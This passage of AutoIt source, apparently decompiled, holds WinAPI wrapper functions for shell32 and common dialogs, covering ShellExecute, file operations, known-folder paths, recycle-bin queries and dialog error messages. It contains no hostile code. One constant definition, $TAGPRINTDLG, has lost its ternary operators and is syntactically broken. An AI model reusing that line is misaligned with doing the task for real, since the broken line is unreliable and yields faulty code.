"wstr" , $SROOT , "dword" , $IFLAGS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_SHELLEXECUTE ($SFILEPATH , $SARGS = "" , $SDIR = "" , $SVERB = "" , $ISHOW = 1 , $HPARENT = 0 ) LOCAL $STYPEOFARGS = "wstr" , $STYPEOFDIR = "wstr" , $STYPEOFVERB = "wstr" IF NOT STRINGSTRIPWS ($SARGS , $STR_STRIPLEADING + $STR_STRIPTRAILING ) THEN $STYPEOFARGS = "ptr" $SARGS = 0 ENDIF IF NOT STRINGSTRIPWS ($SDIR , $STR_STRIPLEADING + $STR_STRIPTRAILING ) THEN $STYPEOFDIR = "ptr" $SDIR = 0 ENDIF IF NOT STRINGSTRIPWS ($SVERB , $STR_STRIPLEADING + $STR_STRIPTRAILING ) THEN $STYPEOFVERB = "ptr" $SVERB = 0 ENDIF LOCAL $ARET = DLLCALL ("shell32.dll" , "ULONG_PTR" , "ShellExecuteW" , "hwnd" , $HPARENT , $STYPEOFVERB , $SVERB , "wstr" , $SFILEPATH , $STYPEOFARGS , $SARGS , $STYPEOFDIR , $SDIR , "int" , $ISHOW ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) IF $ARET [0 ] <= 32 THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SHELLEXECUTEEX (BYREF $TSHEXINFO ) LOCAL $ARET = DLLCALL ("shell32.dll" , "bool" , "ShellExecuteExW" , "struct*" , $TSHEXINFO ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SHELLEXTRACTASSOCIATEDICON ($SFILEPATH , $BSMALL = FALSE ) LOCAL $IFLAGS = 256 IF NOT _WINAPI_PATHISDIRECTORY ($SFILEPATH ) THEN $IFLAGS = BITOR ($IFLAGS , 16 ) ENDIF IF $BSMALL THEN $IFLAGS = BITOR ($IFLAGS , 1 ) ENDIF LOCAL $TSHFILEINFO = DLLSTRUCTCREATE ($TAGSHFILEINFO ) IF NOT _WINAPI_SHELLGETFILEINFO ($SFILEPATH , $IFLAGS , 0 , $TSHFILEINFO ) THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) RETURN DLLSTRUCTGETDATA ($TSHFILEINFO , "hIcon" ) ENDFUNC FUNC _WINAPI_SHELLEXTRACTICON ($SICON , $IINDEX , $IWIDTH , $IHEIGHT ) LOCAL $ARET = DLLCALL ("shell32.dll" , "int" , "SHExtractIconsW" , "wstr" , $SICON , "int" , $IINDEX , "int" , $IWIDTH , "int" , $IHEIGHT , "ptr*" , 0 , "ptr*" , 0 , "int" , 1 , "int" 
, 0 ) IF @ERROR OR NOT $ARET [0 ] OR NOT $ARET [5 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [5 ] ENDFUNC FUNC _WINAPI_SHELLFILEOPERATION ($SFROM , $STO , $IFUNC , $IFLAGS , $STITLE = "" , $HPARENT = 0 ) LOCAL $IDATA IF NOT ISARRAY ($SFROM ) THEN $IDATA = $SFROM DIM $SFROM [1 ] = [$IDATA ] ENDIF LOCAL $TFROM = _WINAPI_ARRAYTOSTRUCT ($SFROM ) IF @ERROR THEN RETURN SETERROR (@ERROR + 20 , @EXTENDED , 0 ) IF NOT ISARRAY ($STO ) THEN $IDATA = $STO DIM $STO [1 ] = [$IDATA ] ENDIF LOCAL $TTO = _WINAPI_ARRAYTOSTRUCT ($STO ) IF @ERROR THEN RETURN SETERROR (@ERROR + 30 , @EXTENDED , 0 ) LOCAL $TSHFILEOPSTRUCT = DLLSTRUCTCREATE ($TAGSHFILEOPSTRUCT ) DLLSTRUCTSETDATA ($TSHFILEOPSTRUCT , "hWnd" , $HPARENT ) DLLSTRUCTSETDATA ($TSHFILEOPSTRUCT , "Func" , $IFUNC ) DLLSTRUCTSETDATA ($TSHFILEOPSTRUCT , "From" , DLLSTRUCTGETPTR ($TFROM ) ) DLLSTRUCTSETDATA ($TSHFILEOPSTRUCT , "To" , DLLSTRUCTGETPTR ($TTO ) ) DLLSTRUCTSETDATA ($TSHFILEOPSTRUCT , "Flags" , $IFLAGS ) DLLSTRUCTSETDATA ($TSHFILEOPSTRUCT , "ProgressTitle" , $STITLE ) LOCAL $ARET = DLLCALL ("shell32.dll" , "int" , "SHFileOperationW" , "struct*" , $TSHFILEOPSTRUCT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) RETURN $TSHFILEOPSTRUCT ENDFUNC FUNC _WINAPI_SHELLFLUSHSFCACHE () DLLCALL ("shell32.dll" , "none" , "SHFlushSFCache" ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_SHELLGETFILEINFO ($SFILEPATH , $IFLAGS , $IATTRIBUTES , BYREF $TSHFILEINFO ) LOCAL $ARET = DLLCALL ("shell32.dll" , "dword_ptr" , "SHGetFileInfoW" , "wstr" , $SFILEPATH , "dword" , $IATTRIBUTES , "struct*" , $TSHFILEINFO , "uint" , DLLSTRUCTGETSIZE ($TSHFILEINFO ) , "uint" , $IFLAGS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SHELLGETICONOVERLAYINDEX ($SICON , $IINDEX ) LOCAL $STYPEOFICON = "wstr" IF NOT STRINGSTRIPWS ($SICON , $STR_STRIPLEADING + $STR_STRIPTRAILING ) THEN 
$STYPEOFICON = "ptr" $SICON = 0 ENDIF LOCAL $ARET = DLLCALL ("shell32.dll" , "int" , "SHGetIconOverlayIndexW" , $STYPEOFICON , $SICON , "int" , $IINDEX ) IF @ERROR OR ($ARET [0 ] = + 4294967295 ) THEN RETURN SETERROR (@ERROR , @EXTENDED , + 4294967295 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SHELLGETKNOWNFOLDERIDLIST ($SGUID , $IFLAGS = 0 , $HTOKEN = 0 ) LOCAL $TGUID = DLLSTRUCTCREATE ($TAGGUID ) LOCAL $ARET = DLLCALL ("ole32.dll" , "uint" , "CLSIDFromString" , "wstr" , $SGUID , "struct*" , $TGUID ) IF @ERROR OR $ARET [0 ] THEN RETURN SETERROR (@ERROR + 20 , @EXTENDED , 0 ) $ARET = DLLCALL ("shell32.dll" , "uint" , "SHGetKnownFolderIDList" , "struct*" , $TGUID , "dword" , $IFLAGS , "handle" , $HTOKEN , "ptr*" , 0 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) RETURN $ARET [4 ] ENDFUNC FUNC _WINAPI_SHELLGETKNOWNFOLDERPATH ($SGUID , $IFLAGS = 0 , $HTOKEN = 0 ) LOCAL $TGUID = DLLSTRUCTCREATE ($TAGGUID ) LOCAL $ARET = DLLCALL ("ole32.dll" , "long" , "CLSIDFromString" , "wstr" , $SGUID , "struct*" , $TGUID ) IF @ERROR OR $ARET [0 ] THEN RETURN SETERROR (@ERROR + 20 , @EXTENDED , "" ) $ARET = DLLCALL ("shell32.dll" , "long" , "SHGetKnownFolderPath" , "struct*" , $TGUID , "dword" , $IFLAGS , "handle" , $HTOKEN , "ptr*" , 0 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , "" ) LOCAL $SPATH = _WINAPI_GETSTRING ($ARET [4 ] ) _WINAPI_COTASKMEMFREE ($ARET [4 ] ) RETURN $SPATH ENDFUNC FUNC _WINAPI_SHELLGETLOCALIZEDNAME ($SFILEPATH ) LOCAL $ARET = DLLCALL ("shell32.dll" , "long" , "SHGetLocalizedName" , "wstr" , $SFILEPATH , "wstr" , "" , "uint*" , 0 , "int*" , 0 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) LOCAL $ARESULT [2 ] LOCAL $ARET1 = DLLCALL ("kernel32.dll" , "dword" , "ExpandEnvironmentStringsW" , "wstr" , $ARET [2 ] , "wstr" , "" , "dword" , 4096 ) $ARESULT [0 ] = 
$ARET1 [2 ] $ARESULT [1 ] = $ARET [4 ] RETURN $ARESULT ENDFUNC FUNC _WINAPI_SHELLGETPATHFROMIDLIST ($PPIDL ) LOCAL $ARET = DLLCALL ("shell32.dll" , "bool" , "SHGetPathFromIDListW" , "struct*" , $PPIDL , "wstr" , "" ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN $ARET [2 ] ENDFUNC FUNC _WINAPI_SHELLGETSETFOLDERCUSTOMSETTINGS ($SFILEPATH , $IFLAG , BYREF $TSHFCS ) LOCAL $SPROC = "SHGetSetFolderCustomSettings" IF $__WINVER < 1536 THEN $SPROC &= "W" LOCAL $ARET = DLLCALL ("shell32.dll" , "long" , $SPROC , "struct*" , $TSHFCS , "wstr" , $SFILEPATH , "dword" , $IFLAG ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_SHELLGETSETTINGS ($IFLAGS ) LOCAL $TSHELLSTATE = DLLSTRUCTCREATE ("uint[8]" ) DLLCALL ("shell32.dll" , "none" , "SHGetSetSettings" , "struct*" , $TSHELLSTATE , "dword" , $IFLAGS , "bool" , 0 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) LOCAL $IVAL1 = DLLSTRUCTGETDATA ($TSHELLSTATE , 1 , 1 ) LOCAL $IVAL2 = DLLSTRUCTGETDATA ($TSHELLSTATE , 1 , 8 ) LOCAL $IRESULT = 0 LOCAL $AOPT [20 ] [2 ] = [[1 , 1 ] , [2 , 2 ] , [4 , 32768 ] , [8 , 32 ] , [16 , 8 ] , [32 , 128 ] , [64 , 512 ] , [128 , 1024 ] , [256 , 2048 ] , [1024 , 4096 ] , [2048 , 8192 ] , [4096 , 16384 ] , [8192 , 131072 ] , [32768 , 262144 ] , [65536 , 1048576 ] , [1 , 524288 ] , [2 , 2097152 ] , [8 , 8388608 ] , [16 , 16777216 ] , [32 , 33554432 ] ] FOR $I = 0 TO 14 IF BITAND ($IVAL1 , $AOPT [$I ] [0 ] ) THEN $IRESULT += $AOPT [$I ] [1 ] ENDIF NEXT FOR $I = 15 TO 19 IF BITAND ($IVAL2 , $AOPT [$I ] [0 ] ) THEN $IRESULT += $AOPT [$I ] [1 ] ENDIF NEXT RETURN $IRESULT ENDFUNC FUNC _WINAPI_SHELLGETSPECIALFOLDERLOCATION ($ICSIDL ) LOCAL $ARET = DLLCALL ("shell32.dll" , "long" , "SHGetSpecialFolderLocation" , "hwnd" , 0 , "int" , $ICSIDL , "ptr*" , 0 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) 
RETURN $ARET [3 ] ENDFUNC FUNC _WINAPI_SHELLGETSPECIALFOLDERPATH ($ICSIDL , $BCREATE = FALSE ) LOCAL $ARET = DLLCALL ("shell32.dll" , "bool" , "SHGetSpecialFolderPathW" , "hwnd" , 0 , "wstr" , "" , "int" , $ICSIDL , "bool" , $BCREATE ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , "" ) RETURN $ARET [2 ] ENDFUNC FUNC _WINAPI_SHELLGETSTOCKICONINFO ($ISIID , $IFLAGS ) LOCAL $TSHSTOCKICONINFO = DLLSTRUCTCREATE ($TAGSHSTOCKICONINFO ) DLLSTRUCTSETDATA ($TSHSTOCKICONINFO , "Size" , DLLSTRUCTGETSIZE ($TSHSTOCKICONINFO ) ) LOCAL $ARET = DLLCALL ("shell32.dll" , "long" , "SHGetStockIconInfo" , "int" , $ISIID , "uint" , $IFLAGS , "struct*" , $TSHSTOCKICONINFO ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) RETURN $TSHSTOCKICONINFO ENDFUNC FUNC _WINAPI_SHELLILCREATEFROMPATH ($SFILEPATH ) LOCAL $ARET = DLLCALL ("shell32.dll" , "long" , "SHILCreateFromPath" , "wstr" , $SFILEPATH , "ptr*" , 0 , "dword*" , 0 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) RETURN $ARET [2 ] ENDFUNC FUNC _WINAPI_SHELLNOTIFYICON ($IMESSAGE , BYREF $TNOTIFYICONDATA ) LOCAL $ARET = DLLCALL ("shell32.dll" , "bool" , "Shell_NotifyIconW" , "dword" , $IMESSAGE , "struct*" , $TNOTIFYICONDATA ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SHELLNOTIFYICONGETRECT ($HWND , $IID , $TGUID = 0 ) LOCAL $TNII = DLLSTRUCTCREATE ("dword;hwnd;uint;" & $TAGGUID ) DLLSTRUCTSETDATA ($TNII , 1 , DLLSTRUCTGETSIZE ($TNII ) ) DLLSTRUCTSETDATA ($TNII , 2 , $HWND ) DLLSTRUCTSETDATA ($TNII , 3 , $IID ) IF ISDLLSTRUCT ($TGUID ) THEN IF NOT _WINAPI_MOVEMEMORY (DLLSTRUCTGETPTR ($TNII , 4 ) , $TGUID , 16 ) THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) ENDIF LOCAL $TRECT = DLLSTRUCTCREATE ($TAGRECT ) LOCAL $ARET = DLLCALL ("shell32.dll" , "long" , "Shell_NotifyIconGetRect" , "struct*" , $TNII , "struct*" , 
$TRECT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) RETURN $TRECT ENDFUNC FUNC _WINAPI_SHELLOBJECTPROPERTIES ($SFILEPATH , $ITYPE = 2 , $SPROPERTY = "" , $HPARENT = 0 ) LOCAL $STYPEOFPROPERTY = "wstr" IF NOT STRINGSTRIPWS ($SPROPERTY , $STR_STRIPLEADING + $STR_STRIPTRAILING ) THEN $STYPEOFPROPERTY = "ptr" $SPROPERTY = 0 ENDIF LOCAL $ARET = DLLCALL ("shell32.dll" , "bool" , "SHObjectProperties" , "hwnd" , $HPARENT , "dword" , $ITYPE , "wstr" , $SFILEPATH , $STYPEOFPROPERTY , $SPROPERTY ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SHELLOPENFOLDERANDSELECTITEMS ($SFILEPATH , $ANAMES = 0 , $ISTART = 0 , $IEND = + 4294967295 , $IFLAGS = 0 ) LOCAL $PPIDL , $ARET , $TPTR = 0 , $ICOUNT = 0 , $IOBJ = 0 , $IERROR = 0 $SFILEPATH = _WINAPI_PATHREMOVEBACKSLASH (_WINAPI_PATHSEARCHANDQUALIFY ($SFILEPATH ) ) IF ISARRAY ($ANAMES ) THEN IF $SFILEPATH AND NOT _WINAPI_PATHISDIRECTORY ($SFILEPATH ) THEN RETURN SETERROR (@ERROR + 20 , @EXTENDED , 0 ) ENDIF $PPIDL = _WINAPI_SHELLILCREATEFROMPATH ($SFILEPATH ) IF @ERROR THEN RETURN SETERROR (@ERROR + 30 , @EXTENDED , 0 ) IF NOT __CHECKERRORARRAYBOUNDS ($ANAMES , $ISTART , $IEND ) THEN $TPTR = DLLSTRUCTCREATE ("ptr[" & ($IEND - $ISTART + 1 ) & "]" ) FOR $I = $ISTART TO $IEND $ICOUNT += 1 IF $ANAMES [$I ] THEN DLLSTRUCTSETDATA ($TPTR , 1 , _WINAPI_SHELLILCREATEFROMPATH ($SFILEPATH & "\" & $ANAMES [$I ] ) , $ICOUNT ) ELSE DLLSTRUCTSETDATA ($TPTR , 1 , 0 , $ICOUNT ) ENDIF NEXT ENDIF IF _WINAPI_COINITIALIZE () THEN $IOBJ = 1 $ARET = DLLCALL ("shell32.dll" , "long" , "SHOpenFolderAndSelectItems" , "ptr" , $PPIDL , "uint" , $ICOUNT , "struct*" , $TPTR , "dword" , $IFLAGS ) IF @ERROR THEN $IERROR = @ERROR + 10 ELSE IF $ARET [0 ] THEN $IERROR = 10 ENDIF IF $IOBJ THEN _WINAPI_COUNINITIALIZE () _WINAPI_COTASKMEMFREE ($PPIDL ) FOR $I = 1 TO $ICOUNT $PPIDL = DLLSTRUCTGETDATA ($TPTR , $I ) IF $PPIDL THEN _WINAPI_COTASKMEMFREE 
($PPIDL ) ENDIF NEXT IF $IERROR = 10 THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) IF $IERROR THEN RETURN SETERROR ($IERROR , 0 , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_SHELLQUERYRECYCLEBIN ($SROOT = "" ) LOCAL $TSHQRBI = DLLSTRUCTCREATE ("align 4;dword_ptr;int64;int64" ) DLLSTRUCTSETDATA ($TSHQRBI , 1 , DLLSTRUCTGETSIZE ($TSHQRBI ) ) LOCAL $ARET = DLLCALL ("shell32.dll" , "long" , "SHQueryRecycleBinW" , "wstr" , $SROOT , "struct*" , $TSHQRBI ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) LOCAL $ARESULT [2 ] $ARESULT [0 ] = DLLSTRUCTGETDATA ($TSHQRBI , 2 ) $ARESULT [1 ] = DLLSTRUCTGETDATA ($TSHQRBI , 3 ) RETURN $ARESULT ENDFUNC FUNC _WINAPI_SHELLQUERYUSERNOTIFICATIONSTATE () LOCAL $ARET = DLLCALL ("shell32.dll" , "long" , "SHQueryUserNotificationState" , "uint*" , 0 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) RETURN $ARET [1 ] ENDFUNC FUNC _WINAPI_SHELLREMOVELOCALIZEDNAME ($SFILEPATH ) LOCAL $ARET = DLLCALL ("shell32.dll" , "long" , "SHRemoveLocalizedName" , "wstr" , $SFILEPATH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_SHELLRESTRICTED ($IRESTRICTION ) LOCAL $ARET = DLLCALL ("shell32.dll" , "dword" , "SHRestricted" , "uint" , $IRESTRICTION ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SHELLSETKNOWNFOLDERPATH ($SGUID , $SFILEPATH , $IFLAGS = 0 , $HTOKEN = 0 ) LOCAL $TGUID = DLLSTRUCTCREATE ($TAGGUID ) LOCAL $ARET = DLLCALL ("ole32.dll" , "long" , "CLSIDFromString" , "wstr" , $SGUID , "struct*" , $TGUID ) IF @ERROR OR $ARET [0 ] THEN RETURN SETERROR (@ERROR + 20 , @EXTENDED , 0 ) $ARET = DLLCALL ("shell32.dll" , "long" , "SHSetKnownFolderPath" , "struct*" , $TGUID , "dword" , $IFLAGS , "handle" , $HTOKEN , "wstr" , $SFILEPATH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 
0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_SHELLSETLOCALIZEDNAME ($SFILEPATH , $SMODULE , $IRESID ) LOCAL $ARET = DLLCALL ("shell32.dll" , "long" , "SHSetLocalizedName" , "wstr" , $SFILEPATH , "wstr" , $SMODULE , "int" , $IRESID ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_SHELLSETSETTINGS ($IFLAGS , $BSET ) LOCAL $IVAL1 = 0 , $IVAL2 = 0 LOCAL $AOPT [20 ] [2 ] = [[1 , 1 ] , [2 , 2 ] , [4 , 32768 ] , [8 , 32 ] , [16 , 8 ] , [32 , 128 ] , [64 , 512 ] , [128 , 1024 ] , [256 , 2048 ] , [1024 , 4096 ] , [2048 , 8192 ] , [4096 , 16384 ] , [8192 , 131072 ] , [32768 , 262144 ] , [65536 , 1048576 ] , [1 , 524288 ] , [2 , 2097152 ] , [8 , 8388608 ] , [16 , 16777216 ] , [32 , 33554432 ] ] IF $BSET THEN FOR $I = 0 TO 14 IF BITAND ($IFLAGS , $AOPT [$I ] [1 ] ) THEN $IVAL1 += $AOPT [$I ] [0 ] ENDIF NEXT FOR $I = 15 TO 19 IF BITAND ($IFLAGS , $AOPT [$I ] [1 ] ) THEN $IVAL2 += $AOPT [$I ] [0 ] ENDIF NEXT ENDIF LOCAL $TSHELLSTATE = DLLSTRUCTCREATE ("uint[8]" ) DLLSTRUCTSETDATA ($TSHELLSTATE , 1 , $IVAL1 , 1 ) DLLSTRUCTSETDATA ($TSHELLSTATE , 1 , $IVAL2 , 8 ) DLLCALL ("shell32.dll" , "none" , "SHGetSetSettings" , "struct*" , $TSHELLSTATE , "dword" , $IFLAGS , "bool" , 1 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_SHELLUPDATEIMAGE ($SICON , $IINDEX , $IIMAGE , $IFLAGS = 0 ) DLLCALL ("shell32.dll" , "none" , "SHUpdateImageW" , "wstr" , $SICON , "int" , $IINDEX , "uint" , $IFLAGS , "int" , $IIMAGE ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN 1 ENDFUNC #EndRegion Public Functions #Region Global Variables and Constants GLOBAL $__G_PFRBUFFER = 0 , $__G_IFRBUFFERSIZE = 16385 GLOBAL CONST $TAGDEVNAMES = "ushort DriverOffset;ushort DeviceOffset;ushort OutputOffset;ushort Default" GLOBAL CONST $TAGFINDREPLACE = "dword Size;hwnd hOwner;ptr hInstance;dword Flags;ptr FindWhat;ptr 
ReplaceWith;ushort FindWhatLen;ushort ReplaceWithLen;lparam lParam;ptr Hook;ptr TemplateName" GLOBAL CONST $TAGMSGBOXPARAMS = "uint Size;hwnd hOwner;ptr hInstance;int_ptr Text;int_ptr Caption;dword Style;int_ptr Icon;dword_ptr ContextHelpId;ptr MsgBoxCallback;dword LanguageId" GLOBAL CONST $TAGPAGESETUPDLG = "dword Size;hwnd hOwner;ptr hDevMode;ptr hDevNames;dword Flags;long PaperWidth;long PaperHeight;long MarginMinLeft;long MarginMinTop;long MarginMinRight;long MarginMinBottom;long MarginLeft;long MarginTop;long MarginRight;long MarginBottom;ptr hInstance;lparam lParam;ptr PageSetupHook;ptr PagePaintHook;ptr PageSetupTemplateName;ptr hPageSetupTemplate" GLOBAL CONST $TAGPRINTDLG = (@AUTOITX64 "" "align 2;" ) & "dword Size;hwnd hOwner;handle hDevMode;handle hDevNames;handle hDC;dword Flags;word FromPage;word ToPage;word MinPage;word MaxPage;word Copies;handle hInstance;lparam lParam;ptr PrintHook;ptr SetupHook;ptr PrintTemplateName;ptr SetupTemplateName;handle hPrintTemplate;handle hSetupTemplate" GLOBAL CONST $TAGPRINTDLGEX = "dword Size;hwnd hOwner;handle hDevMode;handle hDevNames;handle hDC;dword Flags;dword Flags2;dword ExclusionFlags;dword NumPageRanges;dword MaxPageRanges;ptr PageRanges;dword MinPage;dword MaxPage;dword Copies;handle hInstance;ptr PrintTemplateName;lparam lParam;dword NumPropertyPages;ptr hPropertyPages;dword StartPage;dword ResultAction" GLOBAL CONST $TAGPRINTPAGERANGE = "dword FromPage;dword ToPage" #EndRegion Global Variables and Constants #Region Functions list #EndRegion Functions list #Region Public Functions FUNC _WINAPI_BROWSEFORFOLDERDLG ($SROOT = "" , $STEXT = "" , $IFLAGS = 0 , $PBROWSEPROC = 0 , $LPARAM = 0 , $HPARENT = 0 ) LOCAL CONST $TAGBROWSEINFO = "hwnd hwndOwner;ptr pidlRoot;ptr pszDisplayName; ptr lpszTitle;uint ulFlags;ptr lpfn;lparam lParam;int iImage" LOCAL $TBROWSEINFO = DLLSTRUCTCREATE ($TAGBROWSEINFO & ";wchar[" & (STRINGLEN ($STEXT ) + 1 ) & "];wchar[260]" ) LOCAL $PPIDL = 0 , $SRESULT = "" IF STRINGSTRIPWS ($SROOT 
, $STR_STRIPLEADING + $STR_STRIPTRAILING ) THEN LOCAL $SPATH = _WINAPI_PATHSEARCHANDQUALIFY ($SROOT , 1 ) IF @ERROR THEN $SPATH = $SROOT ENDIF $PPIDL = _WINAPI_SHELLILCREATEFROMPATH ($SPATH ) IF @ERROR THEN ENDIF ENDIF DLLSTRUCTSETDATA ($TBROWSEINFO , 1 , $HPARENT ) DLLSTRUCTSETDATA ($TBROWSEINFO , 2 , $PPIDL ) DLLSTRUCTSETDATA ($TBROWSEINFO , 3 , DLLSTRUCTGETPTR ($TBROWSEINFO , 10 ) ) DLLSTRUCTSETDATA ($TBROWSEINFO , 4 , DLLSTRUCTGETPTR ($TBROWSEINFO , 9 ) ) DLLSTRUCTSETDATA ($TBROWSEINFO , 5 , $IFLAGS ) DLLSTRUCTSETDATA ($TBROWSEINFO , 6 , $PBROWSEPROC ) DLLSTRUCTSETDATA ($TBROWSEINFO , 7 , $LPARAM ) DLLSTRUCTSETDATA ($TBROWSEINFO , 8 , 0 ) DLLSTRUCTSETDATA ($TBROWSEINFO , 9 , $STEXT ) LOCAL $ARET = DLLCALL ("shell32.dll" , "ptr" , "SHBrowseForFolderW" , "struct*" , $TBROWSEINFO ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) $SRESULT = _WINAPI_SHELLGETPATHFROMIDLIST ($ARET [0 ] ) _WINAPI_COTASKMEMFREE ($ARET [0 ] ) IF $PPIDL THEN _WINAPI_COTASKMEMFREE ($PPIDL ) ENDIF IF NOT $SRESULT THEN RETURN SETERROR (10 , 0 , "" ) RETURN $SRESULT ENDFUNC FUNC _WINAPI_COMMDLGEXTENDEDERROR () LOCAL CONST $CDERR_DIALOGFAILURE = 65535 LOCAL CONST $CDERR_FINDRESFAILURE = 6 LOCAL CONST $CDERR_INITIALIZATION = 2 LOCAL CONST $CDERR_LOADRESFAILURE = 7 LOCAL CONST $CDERR_LOADSTRFAILURE = 5 LOCAL CONST $CDERR_LOCKRESFAILURE = 8 LOCAL CONST $CDERR_MEMALLOCFAILURE = 9 LOCAL CONST $CDERR_MEMLOCKFAILURE = 10 LOCAL CONST $CDERR_NOHINSTANCE = 4 LOCAL CONST $CDERR_NOHOOK = 11 LOCAL CONST $CDERR_NOTEMPLATE = 3 LOCAL CONST $CDERR_REGISTERMSGFAIL = 12 LOCAL CONST $CDERR_STRUCTSIZE = 1 LOCAL CONST $FNERR_BUFFERTOOSMALL = 12291 LOCAL CONST $FNERR_INVALIDFILENAME = 12290 LOCAL CONST $FNERR_SUBCLASSFAILURE = 12289 LOCAL $ARESULT = DLLCALL ("comdlg32.dll" , "dword" , "CommDlgExtendedError" ) IF NOT @ERROR THEN SWITCH $ARESULT [0 ] CASE $CDERR_DIALOGFAILURE RETURN SETERROR ($ARESULT [0 ] , 0 , "The dialog box could not be created." 
& @LF & "The common dialog box function's call to the DialogBox function failed." & @LF & "For example, this error occurs if the common dialog box call specifies an invalid window handle." ) CASE $CDERR_FINDRESFAILURE RETURN SETERROR ($ARESULT [0 ] , 0 , "The common dialog box function failed to find a specified resource." ) CASE $CDERR_INITIALIZATION RETURN SETERROR ($ARESULT [0 ] , 0 , "The common dialog box function failed during initialization." & @LF & "This error often occurs when sufficient memory is not available." ) CASE $CDERR_LOADRESFAILURE RETURN SETERROR ($ARESULT [0 ] , 0 , "The common dialog box function failed to load a specified resource." ) CASE $CDERR_LOADSTRFAILURE RETURN SETERROR ($ARESULT [0 ] , 0 , "The common dialog box function failed to load a specified string." ) CASE $CDERR_LOCKRESFAILURE RETURN SETERROR ($ARESULT [0 ] , 0 , "The common dialog box function failed to lock a specified resource." ) CASE $CDERR_MEMALLOCFAILURE RETURN SETERROR ($ARESULT [0 ] , 0 , "The common dialog box function was unable to allocate memory for internal structures." ) CASE $CDERR_MEMLOCKFAILURE RETURN SETERROR ($ARESULT [0 ] , 0 , "The common dialog box function was unable to lock the memory associated with a handle." ) CASE $CDERR_NOHINSTANCE RETURN SETERROR ($ARESULT [0 ] , 0 , "The ENABLETEMPLATE flag was set in the Flags member of the initialization structure for the corresponding common dialog box," & @LF & "but you failed to provide a corresponding instance handle." ) CASE $CDERR_NOHOOK RETURN SETERROR ($ARESULT [0 ] , 0 , "The ENABLEHOOK flag was set in the Flags member of the initialization structure for the corresponding common dialog box," & @LF & "but you failed to provide a pointer to a corresponding hook procedure." 
